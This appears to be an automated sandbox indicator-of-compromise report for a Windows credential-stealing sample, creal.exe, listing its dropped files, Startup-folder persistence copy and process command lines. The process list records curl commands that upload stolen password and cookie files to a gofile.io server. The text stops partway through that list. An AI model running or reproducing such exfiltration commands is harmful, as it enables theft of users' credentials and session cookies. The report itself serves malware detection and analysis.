IOC Report
creal.exe

loading gif

Files

File Path
Type
Category
Malicious
creal.exe
PE32+ executable (GUI) x86-64, for MS Windows
initial sample
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
PE32+ executable (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_ARC4.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_Salsa20.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_chacha20.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_pkcs1_decode.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_aesni.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_arc2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_blowfish.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cast.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cbc.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_cfb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ctr.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_des3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ecb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_eksblowfish.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ocb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Cipher\_raw_ofb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2b.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_BLAKE2s.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD4.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_MD5.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_RIPEMD160.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA1.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA224.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA256.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA384.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_SHA512.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_ghash_clmul.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_ghash_portable.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_keccak.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Hash\_poly1305.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Math\_modexp.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Protocol\_scrypt.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ec_ws.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed25519.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_ed448.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\PublicKey\_x25519.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_cpuid_c.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\Crypto\Util\_strxor.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\VCRUNTIME140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\VCRUNTIME140_1.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_asyncio.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_cffi_backend.cp312-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_decimal.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_multiprocessing.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_overlapped.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_queue.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_ssl.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_uuid.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\_wmi.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\base_library.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\bcrypt\_bcrypt.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\certifi\cacert.pem
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\charset_normalizer\md.cp312-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\charset_normalizer\md__mypyc.cp312-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info\INSTALLER
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info\LICENSE
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info\LICENSE.APACHE
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info\LICENSE.BSD
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info\METADATA
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info\RECORD
CSV text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info\WHEEL
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography-41.0.7.dist-info\top_level.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\cryptography\hazmat\bindings\_rust.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info\INSTALLER
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info\LICENSE
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info\METADATA
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info\RECORD
CSV text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info\WHEEL
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\importlib_metadata-7.0.1.dist-info\top_level.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\libcrypto-3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\libffi-8.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\libssl-3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\pyexpat.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\python3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\python312.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\pywin32_system32\pywintypes312.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI42922\win32\win32api.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_ARC4.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_Salsa20.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_chacha20.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_pkcs1_decode.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_aesni.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_arc2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_blowfish.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cast.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cbc.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_cfb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ctr.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_des.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_des3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ecb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_eksblowfish.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ocb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Cipher\_raw_ofb.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_BLAKE2b.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_BLAKE2s.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD4.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_MD5.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_RIPEMD160.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA1.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA224.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA256.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA384.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_SHA512.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_ghash_clmul.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_ghash_portable.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_keccak.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Hash\_poly1305.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Math\_modexp.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Protocol\_scrypt.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ec_ws.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ed25519.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_ed448.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\PublicKey\_x25519.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util\_cpuid_c.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\Crypto\Util\_strxor.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\VCRUNTIME140.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\VCRUNTIME140_1.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_asyncio.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_bz2.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_cffi_backend.cp312-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_ctypes.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_decimal.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_hashlib.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_lzma.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_multiprocessing.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_overlapped.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_queue.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_socket.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_sqlite3.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_ssl.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_uuid.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\_wmi.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\base_library.zip
Zip archive data, at least v2.0 to extract, compression method=store
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\bcrypt\_bcrypt.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\certifi\cacert.pem
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\charset_normalizer\md.cp312-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\charset_normalizer\md__mypyc.cp312-win_amd64.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info\INSTALLER
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info\LICENSE
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info\LICENSE.APACHE
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info\LICENSE.BSD
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info\METADATA
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info\RECORD
CSV text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info\WHEEL
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography-41.0.7.dist-info\top_level.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\cryptography\hazmat\bindings\_rust.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info\INSTALLER
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info\LICENSE
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info\METADATA
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info\RECORD
CSV text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info\WHEEL
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\importlib_metadata-7.0.1.dist-info\top_level.txt
ASCII text
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\libcrypto-3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\libffi-8.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\libssl-3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\pyexpat.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\python3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\python312.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\pywin32_system32\pywintypes312.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\select.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\sqlite3.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\unicodedata.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\_MEI75242\win32\win32api.pyd
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
C:\Users\user\AppData\Local\Temp\crcookies.txt
ASCII text, with CRLF line terminators
dropped
C:\Users\user\AppData\Local\Tempcrcqptdpet.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Tempcrcuthbrer.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Tempcrcwsychbq.db
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Tempcrgdwfnclj.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Tempcrhqznfios.db
SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
dropped
C:\Users\user\AppData\Local\Tempcrqefyfsfs.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Tempcrrrdgqmdo.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
dropped
C:\Users\user\AppData\Local\Tempcruqtngrlp.db
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Tempcrxosudxqf.db
SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 1
dropped
C:\Users\user\AppData\Local\Tempcryoqtqfcj.db
SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
dropped
There are 181 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\creal.exe
"C:\Users\user\Desktop\creal.exe"
malicious
C:\Users\user\Desktop\creal.exe
"C:\Users\user\Desktop\creal.exe"
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe"
malicious
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe
"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\creal.exe"
malicious
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "tasklist"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\tasklist.exe
tasklist
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
curl -F "file=@C:\Users\user\AppData\Local\Temp\crpasswords.txt" https://store4.gofile.io/uploadFile
C:\Windows\System32\cmd.exe
C:\Windows\system32\cmd.exe /c "curl -F "file=@C:\Users\user\AppData\Local\Temp\crcookies.txt" https://store4.gofile.io/uploadFile"
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\curl.exe
